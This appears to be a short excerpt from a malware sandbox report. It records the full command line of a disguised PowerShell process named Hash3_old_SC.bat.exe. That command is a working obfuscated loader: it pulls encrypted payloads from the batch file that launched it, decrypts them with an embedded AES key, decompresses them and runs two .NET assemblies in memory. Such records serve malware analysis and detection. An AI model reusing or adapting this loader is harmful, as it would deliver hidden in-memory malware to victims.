Behavioral Analysis

Hash3_old_SC.bat.exe "C:\Users\test22\AppData\Local\Temp\Hash3_old_SC.bat.exe" -w hidden -c $ArcD='CjTnAreajTnAtejTnADecjTnArjTnAypjTnAtorjTnA'.Replace('jTnA', '');$EIyG='ChajTnAngejTnAExtejTnAnsjTnAijTnAonjTnA'.Replace('jTnA', '');$ddrD='TjTnArajTnAnjTnAsjTnAforjTnAmFijTnAnjTnAajTnAlBlojTnAckjTnA'.Replace('jTnA', '');$HZKC='EntjTnArjTnAyPjTnAoinjTnAtjTnA'.Replace('jTnA', '');$fkvT='FrjTnAomBjTnAasejTnA64jTnAStjTnArijTnAngjTnA'.Replace('jTnA', '');$JDCJ='GjTnAetCjTnAurjTnArejTnAntPrjTnAocjTnAejTnAsjTnAsjTnA'.Replace('jTnA', '');$fjGk='SjTnApljTnAitjTnA'.Replace('jTnA', '');$ZJFf='LoajTnAdjTnA'.Replace('jTnA', '');$fsoP='FirsjTnAtjTnA'.Replace('jTnA', '');$GSDe='IjTnAnvjTnAokjTnAejTnA'.Replace('jTnA', '');$WyFb='MaijTnAnMojTnAdujTnAljTnAejTnA'.Replace('jTnA', '');$DKWO='ReadjTnALinjTnAesjTnA'.Replace('jTnA', '');function BrGrP($WUZkx){$aszSW=[System.Security.Cryptography.Aes]::Create();$aszSW.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aszSW.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aszSW.Key=[System.Convert]::$fkvT('Yg9lQU2I/zPr+3hXJdqcZKMekul1bK9pDFef4vEqPDI=');$aszSW.IV=[System.Convert]::$fkvT('fRifPIwAepUdWFOI5v9eiQ==');$qEOhP=$aszSW.$ArcD();$TIDXf=$qEOhP.$ddrD($WUZkx,0,$WUZkx.Length);$qEOhP.Dispose();$aszSW.Dispose();$TIDXf;}function ZhMnz($WUZkx){$TCOnO=New-Object System.IO.MemoryStream(,$WUZkx);$QqCNk=New-Object System.IO.MemoryStream;$XkOAE=New-Object System.IO.Compression.GZipStream($TCOnO,[IO.Compression.CompressionMode]::Decompress);$XkOAE.CopyTo($QqCNk);$XkOAE.Dispose();$TCOnO.Dispose();$QqCNk.Dispose();$QqCNk.ToArray();}$gfDxw=[System.Linq.Enumerable]::$fsoP([System.IO.File]::$DKWO([System.IO.Path]::$EIyG([System.Diagnostics.Process]::$JDCJ().$WyFb.FileName, $null)));$mxqkG=$gfDxw.Substring(3).$fjGk(':');$VYxVc=ZhMnz (BrGrP ([Convert]::$fkvT($mxqkG[0])));$yVtIo=ZhMnz (BrGrP ([Convert]::$fkvT($mxqkG[1])));[System.Reflection.Assembly]::$ZJFf([byte[]]$yVtIo).$HZKC.$GSDe($null,$null);[System.Reflection.Assembly]::$ZJFf([byte[]]$VYxVc).$HZKC.$GSDe($null,$null);